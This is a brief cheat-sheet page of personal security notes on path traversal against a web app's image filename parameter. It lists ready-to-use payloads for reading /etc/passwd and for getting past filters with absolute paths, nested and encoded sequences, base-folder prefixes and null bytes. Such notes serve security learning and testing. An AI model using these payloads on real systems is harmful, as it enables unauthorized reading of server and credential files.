Link Search Menu Expand Document
Zyber

What is it?

Sometimes we can have a local file inclusion on a parameter:

<img src="/loadImage?filename=218.png">

which can be abused to

https://insecure-website.com/loadImage?filename=../../../etc/passwd

to ‘break out’ of the logic and display a file

But this may be filtered.

filter bypass

absolute path: 

https://insecure-website.com/loadImage?filename=/etc/passwd

bypasses ../ filters

nested sequences 

https://insecure-website.com/loadImage?filename=....//....//...///etc/passwd

or

https://insecure-website.com/loadImage?filename=....\/....\/....\/etc/passwd

where the filter removes ../

superfluous URL decode 

%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../../etc/passwd

or double encoded:

%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../../etc/passwd

or non standard:

..%c0%af..%c0%af..%c0%afetc/passwd

or

..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd

see also filter bypass

Expected base folder: 

filename=/var/www/images/../../../etc/passwd

The filter should be satisfied

use of null byte

When the application expects a .png extension:

filename=../../../etc/passwd%00.png
40397ac9 (main) : 2023-01-11T20:40:16+01:00